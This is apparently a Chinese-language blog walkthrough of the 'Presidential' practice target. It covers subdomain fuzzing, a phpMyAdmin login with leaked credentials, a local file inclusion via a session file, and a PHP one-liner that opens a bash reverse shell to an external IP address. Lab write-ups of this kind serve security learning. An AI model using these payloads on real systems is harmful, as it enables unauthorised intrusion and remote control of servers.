Presidential靶机

一、通过扫描同段IP,得到靶机IP地址

开发的端口信息

 通过扫描目录,拼接目录没有发现信息

 

 但是找到了数据库敏感信息

二、通过观察页面,发现有个域名绑定的点

进行hosts绑定

进行域名访问

 

进行子域名爆破

试了好多种都不行,根据提示下载了个地址

wfuzz -H 'HOST:FUZZ.votenow.local' -u 'http://192.168.40.143' -w /home/kali/Desktop/SecLists-2024.2/Discovery/Web-Content/directory-list-2.3-medium.txt --hw 854,45 

 

成功爆出来一个子域名

三、进行hosts绑定子域名,访问

 

是个数据库登录页面,通过之前发现的数据库信息,登录

 

成功登录

通过查看页面,发现有个users表

 

解密密码,解不出来

查看数据库版本

 利用漏洞工具直接搜索相关漏洞

 kali: searchaploit phpmyadmin

找到相对应的版本

查看该文件路径,并且查看

locate 44928.txt

phpadmin执行sql语句

select '<?php phpinfo();exit;?>'

然后要找到执行命令的session值

 浏览器访问

http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_ls7k5tk0ham4ls298ad3sega9cjgesup

成功解析

将执行语句换成一句话木马

select '<?php system("bash -i >& /dev/tcp/47.99.195.123/5555 0>&1");exit;?>'

 浏览器重新访问

  • 3
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值